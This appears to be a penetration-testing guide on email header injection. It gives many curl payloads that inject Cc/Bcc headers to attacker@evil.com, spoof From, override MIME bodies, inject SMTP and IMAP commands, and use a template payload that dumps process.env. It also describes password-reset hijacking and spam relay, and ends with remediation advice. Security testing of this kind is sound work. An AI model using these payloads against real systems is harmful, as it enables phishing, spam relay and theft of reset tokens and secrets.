testing-for-email-header-injection

# Testing for Email Header Injection

## When to Use
- When testing contact forms, feedback forms, or "email a friend" functionality
- During assessment of password reset email functionality
- When testing newsletter subscription or notification email systems
- During penetration testing of applications that send emails based on user input
- When auditing email-related API endpoints for header injection

## Prerequisites
- Burp Suite for intercepting and modifying HTTP requests
- Understanding of SMTP protocol and email header structure
- Knowledge of CRLF injection techniques (\r\n sequences)
- Test email accounts for receiving injected emails
- Access to application features that trigger email sending
- SMTP server logs access for monitoring injection attempts

## Workflow

### Step 1 — Identify Email Injection Points
```bash
# Identify form fields that end up in email headers:
# - "From" name or email address fields
# - "To" or "CC" fields in sharing features
# - Subject line inputs
# - Reply-To fields

# Common endpoints:
# POST /contact - Contact forms
# POST /share - Share via email features
# POST /invite - Invitation systems
# POST /api/send-email - Email API endpoints
# POST /forgot-password - Password reset forms

# Test basic functionality first
curl -X POST http://target.com/contact \
  -d "name=Test&email=test@test.com&subject=Hello&message=Test message"
```

### Step 2 — Test for CRLF Header Injection
```bash
# Inject additional email headers via CRLF in the email field
curl -X POST http://target.com/contact \
  -d "name=Test&email=test@test.com%0ACc:attacker@evil.com&message=Test"

# Inject BCC header
curl -X POST http://target.com/contact \
  -d "name=Test&email=test@test.com%0ABcc:attacker@evil.com&message=Test"

# Inject via the name field
curl -X POST http://target.com/contact \
  -d "name=Test%0ACc:attacker@evil.com&email=test@test.com&message=Test"

# Inject via subject field
curl -X POST http://target.com/contact \
  -d "name=Test&email=test@test.com&subject=Hello%0ABcc:attacker@evil.com&message=Test"

# Try different CRLF encoding variants
# %0D%0A (CRLF)
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0D%0ACc:attacker@evil.com"

# %0A (LF only)
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0ACc:attacker@evil.com"

# %0D (CR only)
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0DCc:attacker@evil.com"

# Double encoding
curl -X POST http://target.com/contact \
  -d "email=test@test.com%250ACc:attacker@evil.com"
```

### Step 3 — Inject Custom Email Content
```bash
# Override email body by injecting Content-Type and body
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0AContent-Type:text/html%0A%0A<h1>Phishing</h1>"

# Inject additional MIME parts
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0AContent-Type:multipart/mixed;boundary=boundary123%0A--boundary123%0AContent-Type:text/html%0A%0A<script>alert(1)</script>"

# Override From header for email spoofing
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0AFrom:ceo@target.com"

# Inject Reply-To for phishing
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0AReply-To:attacker@evil.com"
```

### Step 4 — Test IMAP/SMTP Injection
```bash
# IMAP command injection via email field
curl -X POST http://target.com/webmail/search \
  -d "query=test%0AEXAMINE INBOX"

# SMTP command injection
curl -X POST http://target.com/api/send \
  -d "to=test@test.com%0ARCPT TO:attacker@evil.com"

# SMTP VRFY command injection
curl -X POST http://target.com/api/verify \
  -d "email=test@test.com%0AVRFY admin"

# Test SMTP relay abuse
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0ATo:victim1@target.com%0ATo:victim2@target.com%0ATo:victim3@target.com"
```

### Step 5 — Test JSON-Based Email APIs
```bash
# JSON API header injection
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":"test@test.com\nCc:attacker@evil.com","subject":"Test","body":"Test"}'

# Array injection for multiple recipients
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":["test@test.com","attacker@evil.com"],"subject":"Test","body":"Test"}'

# Template injection in email body
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":"test@test.com","subject":"Test","body":"{{constructor.constructor(\"return process.env\")()}}"}'
```

### Step 6 — Validate Findings
```bash
# Check if injected CC/BCC emails were received
# Monitor attacker@evil.com inbox for received copies

# Verify header injection via email raw source
# In received email, check "View Original" or "Show Headers"
# Look for injected Cc:, Bcc:, From:, or Reply-To: headers

# Test if the application is usable as a spam relay
# by injecting multiple recipients in BCC

# Document the full injection chain
# 1. Injection point (which field)
# 2. Encoding required (CRLF, URL encoding)
# 3. Impact (spam relay, phishing, data theft)
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| CRLF Injection | Injecting carriage return and line feed characters to create new email headers |
| Header Injection | Adding unauthorized headers (Cc, Bcc, From) to outgoing emails |
| Spam Relay | Abusing email functionality to send spam to arbitrary recipients |
| Email Spoofing | Modifying From or Reply-To headers to impersonate trusted senders |
| MIME Manipulation | Injecting MIME boundaries to override email body content |
| SMTP Command Injection | Injecting raw SMTP commands through unsanitized email parameters |
| Newline Characters | \r\n (CRLF), \n (LF), \r (CR) used to separate email headers |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| Burp Suite | HTTP proxy for modifying email-related form submissions |
| swaks | Swiss Army Knife for SMTP testing and header injection validation |
| OWASP ZAP | Automated scanner with email injection detection |
| mailhog | Local SMTP testing server for capturing injected emails |
| smtp4dev | Development SMTP server for monitoring email injection results |
| Nuclei | Template scanner with email header injection detection templates |

## Common Scenarios

1. **Spam Relay** — Inject BCC headers to relay mass emails through the target's SMTP server, bypassing spam filters that trust the sender domain
2. **Phishing via Contact Form** — Modify From and Reply-To headers to send phishing emails appearing to originate from the target organization
3. **Password Reset Hijack** — Inject CC header in password reset flow to receive a copy of reset tokens sent to the victim
4. **Email Content Override** — Inject MIME Content-Type headers to replace legitimate email body with malicious phishing content
5. **Internal Email Abuse** — Use header injection to send emails to internal addresses not normally accessible through the application

## Output Format

```
## Email Header Injection Report
- **Target**: http://target.com/contact
- **Injection Point**: email field in contact form
- **Encoding Required**: URL-encoded LF (%0A)

### Findings
| # | Field | Payload | Result | Severity |
|---|-------|---------|--------|----------|
| 1 | email | test@test.com%0ACc:evil@evil.com | CC header injected | High |
| 2 | email | test@test.com%0ABcc:evil@evil.com | BCC header injected | High |
| 3 | name | Test%0AFrom:ceo@target.com | From spoofing | Medium |

### Remediation
- Validate email addresses with strict regex rejecting newline characters
- Strip \r, \n, and encoded variants from all email-related input
- Use parameterized email APIs that separate headers from data
- Implement rate limiting on email-sending functionality
```